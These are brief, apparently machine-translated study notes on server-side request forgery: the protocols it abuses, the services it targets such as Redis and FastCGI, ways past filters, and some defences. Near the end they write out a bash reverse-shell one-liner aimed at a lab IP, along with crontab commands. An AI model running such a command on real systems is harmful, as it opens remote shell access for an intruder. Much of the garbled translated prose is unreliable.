2019-11-28: ssrf based learning, notes

ssrf server-side request forgery
ssrf is a method of forming a security breach that initiated the request by the server by a malicious visitors configuration, under normal circumstances, the target ssrf access internal systems from outside the network is not accessible, because it is made official server initiated, so it can request the system which is connected to the internal network isolation out of reasons ssrf formed mostly because the server provides the ability to obtain data from another server application and do not limit the filtering target address, such as from a specified the url address of the web page to obtain textual content, load the specified address pictures, downloads and more

Use ssrf
php protocol, read the source file needs file_get_contents
Gopher bomb shell
inner dict network service
file server file read the current
http / s performed http request, using the http protocol to access the web service network

ssrf attack application
Redis
Discuz
FastCGI
intranet applications
memcache

Bypassing the
url confusion
ip converted to decimal

Defense
restricted only to the protocol http, https protocol
is prohibited skip 30
is provided within a single bright white or limitations url network ip

Rebound shell: the bomb target terminal server to the specified location, and the need to pay attention to pop shell and about the current environment, such as using the pop-up shell apache service is www authority

命令 bin/bash -i >& /dev/tcp/192.168.63.128/7999 0>&1

crontab -l to view the current task
crontab -e add tasks
crontab -r Delete Task

linux scheduled tasks
minute: hour: day: month: Week: command
not, then it is indicated by *

Guess you like

Origin www.cnblogs.com/sym945/p/11955543.html